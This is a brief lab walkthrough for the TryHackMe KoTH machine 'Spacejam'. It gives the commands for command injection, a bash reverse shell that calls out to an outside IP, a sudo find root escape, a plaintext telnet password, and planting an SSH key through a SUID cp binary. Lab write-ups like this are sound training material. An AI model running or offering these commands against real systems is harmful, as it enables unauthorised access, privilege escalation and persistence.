Spacejam

TryHackMe KoTH Machine - Spacejam

PreviousH1 Medium

Last updated 7 months ago

Spacejam

TryHackMe KoTH Machine - Spacejam

Command Injection -

( http://$ip:3000/?cmd= )

Reverse shell - ( user `jordan` )

nc $IP 61432

bash -c 'sh -i >& /dev/tcp/10.8.47.242/8888 0>&1'

Privilege escalation `jordan` - ( sudo for `find` )

sudo find . -exec /bin/bash \; -quit

Initial access

telnet $ip

pass for bunny : carrot123

suid binary to /bin/cp

access jordan user by coping your ssh keys in /home/jordan/.ssh/authorized_keys

LFILE=/home/jordan/.ssh/authorized_keys

 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDldlWF32KQBAJQeyPh7G1ESuLIVch23sifev7Jo2pEx6Agt4KMh491lCfo2TGZ2qZv0sdxndeVgHu8KyFRuyVT+jfrOvAFSUUszTPPdxLCmGyAqbbv+KfrUhbeYvc6lnIbZs7OQal3H61ABHHuAbOFl31JznS1Q5irco84FfjIeE7ZQXFd65ehdNi4B9eO5e1GJA0DMlhCBDt6DlWpUzNPq/uO9UsENaOnOyeCO8x5BaxJ8OHTtGbh33srroBCNW1bjxP7F+KGVOB5xsIRLR7Vf7Ab0bgD0ZBU+d0zqvma6Qm+dcnPBwTUQYO9q3xuqIxKLxkEJIWuuNeXPraatpvb3wkZIHCei5n6+5SAAN9Hp36ffaxefsbpkvHpJ9rnoRaKDbDVjRfjcQh1SR3zehSYcXrZehCa2aG/pBMxJE3oQQDg/Gn3vd7Erco6vw7fo19A8ka2l9rbvrxnXaAP8bKjksDQsBNr7q+uv/RH4YEhYnpwy2N2Q0WgolmXuKcCmDs= h00dy@kali" | /bin/cp /dev/stdin "$LFILE"

PreviousH1 Medium

Last updated 7 months ago

Command Injection -

Reverse shell - ( user jordan )

Privilege escalation jordan - ( sudo for find )

Initial access

Command Injection -

Reverse shell - ( user jordan )

Privilege escalation jordan - ( sudo for find )

Initial access

Reverse shell - ( user `jordan` )

Privilege escalation `jordan` - ( sudo for `find` )

Reverse shell - ( user `jordan` )

Privilege escalation `jordan` - ( sudo for `find` )